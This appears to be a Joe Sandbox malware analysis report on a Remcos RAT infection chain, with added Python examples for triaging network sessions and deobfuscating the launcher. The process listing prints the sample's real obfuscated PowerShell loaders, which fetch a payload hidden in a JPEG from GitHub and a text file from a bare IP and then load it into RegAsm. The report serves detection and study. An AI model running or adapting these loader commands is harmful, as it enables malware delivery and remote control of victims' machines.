                                                              Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
2024-10-14 09:36:08 UTC | 1378 | IN | Data Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                              Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
2024-10-14 09:36:08 UTC | 1378 | IN | Data Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                              Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#
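Three HTTP sessions are recorded above: powershell.exe (PID 4720) fetching a 659456-byte text/plain file from a bare IP, RegAsm.exe (PID 3092) querying geoplugin.net, and powershell.exe fetching a 6331693-byte file named as a JPEG from raw.githubusercontent.com. The Python below is an added example and not part of the Joe Sandbox report: it re-encodes those three sessions as constructed rows (the values are copied from the report, the row layout is ours) and runs a handful of triage rules over them, each of which fires on at least one of the report's sessions. The process lists, the geolocation-service list and the 512 KiB size threshold are our assumptions, not anything the report states.

```python
import re

# Constructed rows mirroring the three sessions in the report above. Field values are taken
# from the report; the dictionary layout is ours (an assumption about how a proxy log is shaped).
SESSIONS = [
    {"pid": 4720, "process": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "dst": "192.3.220.40", "port": 80, "host": "192.3.220.40",
     "request": "GET /450/RRFCCE.txt HTTP/1.1",
     "content_type": "text/plain", "length": 659456},
    {"pid": 3092, "process": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "dst": "178.237.33.50", "port": 80, "host": "geoplugin.net",
     "request": "GET /json.gp HTTP/1.1",
     "content_type": "application/json; charset=utf-8", "length": 962},
    {"pid": 4720, "process": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "dst": "185.199.111.133", "port": 443, "host": "raw.githubusercontent.com",
     "request": "GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1",
     "content_type": "application/octet-stream", "length": 6331693},
]

# Rule tables (our assumptions, not the report's).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# .NET utilities that have no legitimate reason to speak HTTP; frequent hollowing targets.
NON_NETWORK_LOLBINS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
GEO_SERVICES = {"geoplugin.net", "ip-api.com", "ipinfo.io", "api.ipify.org"}
STATIC_EXT = (".txt", ".jpg", ".jpeg", ".png", ".gif", ".pdf")
BARE_IP = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
OVERSIZED = 512 * 1024  # a .txt or .jpg larger than this deserves a second look (threshold assumed)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def request_path(request_line: str) -> str:
    """Path component of an HTTP request line such as 'GET /x HTTP/1.1'."""
    parts = request_line.split()
    return parts[1] if len(parts) >= 2 else ""


def triage(session: dict) -> list:
    """Return the names of every rule the session trips (empty list means nothing notable)."""
    proc = basename(session["process"])
    path = request_path(session["request"]).lower()
    findings = []
    if proc in SCRIPT_HOSTS:
        findings.append("script_host_download")
    if proc in NON_NETWORK_LOLBINS:
        findings.append("lolbin_http")
    if BARE_IP.match(session["host"]):
        findings.append("bare_ip_host")
    if session["host"].lower() in GEO_SERVICES:
        findings.append("geolocation_lookup")
    if path.endswith(STATIC_EXT) and session["length"] > OVERSIZED:
        findings.append("oversized_static_file")
    return findings


def triage_all(sessions: list) -> dict:
    """Map (pid, process basename, host) to the list of findings for that session."""
    return {(s["pid"], basename(s["process"]), s["host"]): triage(s) for s in sessions}


if __name__ == "__main__":
    ranked = sorted(triage_all(SESSIONS).items(), key=lambda kv: -len(kv[1]))
    for key, findings in ranked:
        print(key, "->", ", ".join(findings) or "-")
```

None of these rules is conclusive on its own (a browser-less admin script may well pull a text file from an IP address), but the combination seen here, a script host downloading oversized static files plus a .NET utility asking a geolocation service where it is, is the kind of cluster that separates the report's sessions from routine traffic.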



                                                              Target ID:0
                                                              Start time:05:35:55
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:mshta.exe "C:\Users\user\Desktop\na.hta"
                                                              Imagebase:0x230000
                                                              File size:13'312 bytes
                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:05:35:55
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"
                                                              Imagebase:0x480000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true
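The launcher command line recorded under Target ID 1 never contains the strings `::` or `"` literally: it assembles them from `[char]58`, `[char]0x3a`, `[char]34` and `[char]0X22` joined with `+`, so that neither `System.Convert::FromBase64String` nor the quoted base64 argument appears contiguously, and it mangles the case of almost every keyword. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it resolves the `[char]` casts, folds the concatenations, extracts and decodes the base64 argument, and lists the tokens whose casing matches no accepted spelling. Because the report replaces the real base64 blob with a placeholder, the payload here is a constructed, harmless stand-in spliced into a copy of the report's command line, and the table of canonical spellings is our own assumption.

```python
import base64
import re

# SAMPLE_PAYLOAD is a constructed, harmless stand-in: the report above replaces the sample's
# real base64 blob with a placeholder, so this is an assumption, not the sample's stage 2.
SAMPLE_PAYLOAD = base64.b64encode(b"Write-Host 'constructed stage-2 stub'").decode("ascii")

# Constructed command line reproducing the obfuscation pattern from Target ID 1 in the report,
# with our stand-in payload inserted where the report shows the placeholder.
SAMPLE_CMDLINE = (
    "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; "
    "IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'"
    "+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'" + SAMPLE_PAYLOAD
    + "'+[ChAr]0X22+'))')))"
)

CHAR_TOKEN = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
B64_ARG = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"', re.IGNORECASE)

# Accepted spellings of the tokens this launcher mangles (our own list, an assumption).
CANONICAL = {
    "powershell": "PowerShell", "bypass": "Bypass", "iex": "IEX", "char": "Char",
    "system": "System", "text": "Text", "encoding": "Encoding", "convert": "Convert",
    "getstring": "GetString", "frombase64string": "FromBase64String",
}


def resolve_char_tokens(cmd: str) -> str:
    """Replace [char]N / [char]0xNN with a single-quoted literal so the '+' chain can be folded.
    A resolved apostrophe (char 39) would break the quoting, so it is left as a marker instead."""
    def repl(m):
        tok = m.group(1)
        code = int(tok, 16) if tok.lower().startswith("0x") else int(tok)
        return "<SQUOTE>" if code == 39 else "'" + chr(code) + "'"
    return CHAR_TOKEN.sub(repl, cmd)


def fold_concatenations(cmd: str) -> str:
    """Fold 'a'+'b' into 'ab' repeatedly until no adjacent single-quoted literals remain."""
    prev = None
    while prev != cmd:
        prev = cmd
        cmd = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmd)
    return cmd


def case_anomalies(cmd: str) -> list:
    """Tokens from CANONICAL written in a casing that is neither canonical, all-lower nor
    all-upper; an approximation of the report's 'PowerShell case anomaly found' signature."""
    hits = []
    for word in re.findall(r"[A-Za-z][A-Za-z0-9]*", cmd):
        canon = CANONICAL.get(word.lower())
        if canon is None or word in (canon, word.lower(), word.upper()):
            continue
        if word not in hits:
            hits.append(word)
    return hits


def deobfuscate(cmd: str) -> dict:
    """Fold the launcher and decode the base64 argument it hands to Invoke-Expression."""
    folded = fold_concatenations(resolve_char_tokens(cmd))
    m = B64_ARG.search(folded)
    stage2 = base64.b64decode(m.group(1)).decode("utf-8", "replace") if m else None
    return {
        "folded": folded,
        "stage2": stage2,
        "invokes_expression": bool(re.search(r"\biex\b|invoke-expression", cmd, re.IGNORECASE)),
        "case_anomalies": case_anomalies(cmd),
    }


if __name__ == "__main__":
    result = deobfuscate(SAMPLE_CMDLINE)
    print("folded :", result["folded"])
    print("stage2 :", result["stage2"])
    print("IEX    :", result["invokes_expression"])
    print("anomaly:", ", ".join(result["case_anomalies"]))
```

After folding, the inner argument reads `[SYStEm.tEXt.enCoDing]::Utf8.gEtsTRiNg([sYstEM.CoNVErT]::FromBaSE64sTrIng("..."))`, which is exactly the pattern the report's Sigma rules for `FromBase64String` and encoded commands look for; the point of the `[char]` casts is to keep that pattern out of the raw command line, which is why a detection that only greps the command line and does not fold it misses this launcher.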

                                                              Target ID:2
                                                              Start time:05:35:55
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:05:35:56
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                                                              Imagebase:0x480000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:05:35:59
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"
                                                              Imagebase:0x710000
                                                              File size:2'141'552 bytes
                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:05:35:59
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC057.tmp" "c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP"
                                                              Imagebase:0x950000
                                                              File size:46'832 bytes
                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:05:36:04
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                                                              Imagebase:0xfd0000
                                                              File size:147'456 bytes
                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:05:36:04
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                              Imagebase:0x480000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:05:36:04
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:9
                                                              Start time:05:36:05
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                                                              Imagebase:0x480000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:05:36:13
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                              Imagebase:0xc60000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4474275239.0000000002D4E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:12
                                                              Start time:05:36:16
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu"
                                                              Imagebase:0xa50000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:05:36:16
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
                                                              Imagebase:0x120000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:05:36:16
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
                                                              Imagebase:0x630000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:15
                                                              Start time:05:36:16
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdkjbynsalyk"
                                                              Imagebase:0x620000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 18f545633d9a773b604beb85d0b68f6762ff396e757da13bdeb0c5cbc733a1d4
                                                                • Instruction ID: 07ff3ae37fb6e82c4eb790c932406be95b3bad3e8bc780ced684e045df613325
                                                                • Opcode Fuzzy Hash: 18f545633d9a773b604beb85d0b68f6762ff396e757da13bdeb0c5cbc733a1d4
                                                                • Instruction Fuzzy Hash: 9801696280D3C09FD7128B258C84652BFA8EF43624F0D84DBEC988F2A7C2695C45C776
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2118019534.000000000345D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0345D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_345d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a59edd28baf731ad40689aeb3132f80e545067acccecec1fb8c337071746a930
                                                                • Instruction ID: 1bf1b2a55a0326dbef71f92afc64e20e3d417d44b96c83d776a12b2fc6775650
                                                                • Opcode Fuzzy Hash: a59edd28baf731ad40689aeb3132f80e545067acccecec1fb8c337071746a930
                                                                • Instruction Fuzzy Hash: BA01D432C053009AD720CA19CD84B67BF9CEF46728F18C46AFD590E247C2799842C6B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2138709012.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$X=Jl$$]q$$]q
                                                                • API String ID: 0-1729112259
                                                                • Opcode ID: 438b1d061647e94973839e12c84a71d875522af0ad16f402fba6176ad8e5c109
                                                                • Instruction ID: 3ab346226c0fe0704b01318d9fc6d2c5ea02323bea6ecdc336797c125b271c60
                                                                • Opcode Fuzzy Hash: 438b1d061647e94973839e12c84a71d875522af0ad16f402fba6176ad8e5c109
                                                                • Instruction Fuzzy Hash: 805134B1B043068FCB248F2994947AABBF5EF82310F16846BC845CB295DB35D985C7E2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2138709012.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                • API String ID: 0-978391646
                                                                • Opcode ID: c50c3fb8f7932262cf19fdd3d2b45f54f3db77f7e8769a4ae0adae4ed1bd3614
                                                                • Instruction ID: 407ce01f4d8e06d5e0c3c2feee99cfa1d1ec8b4ec1744c3f44e55e1362dbc97f
                                                                • Opcode Fuzzy Hash: c50c3fb8f7932262cf19fdd3d2b45f54f3db77f7e8769a4ae0adae4ed1bd3614
                                                                • Instruction Fuzzy Hash: 09018F6170D3950FC72B16292C7022A6FB66F8396032B45D7C4C0DF2E7C9694E8683E3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2060426178.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_4230000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d23c187fa4c9bbf37fb74aee6808f79be5e3f3307c4859b86d7f8127082f98e7
                                                                • Instruction ID: 8a0664242946edf52eae1af18cffb3b4546e86985d6764f974ed5fc41f6c5591
                                                                • Opcode Fuzzy Hash: d23c187fa4c9bbf37fb74aee6808f79be5e3f3307c4859b86d7f8127082f98e7
                                                                • Instruction Fuzzy Hash: 68918AB4A00205DFCB15CF59C594AAEFBB1FF48311B258999D815AB3A5C735FC81CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2065861611.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_70f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
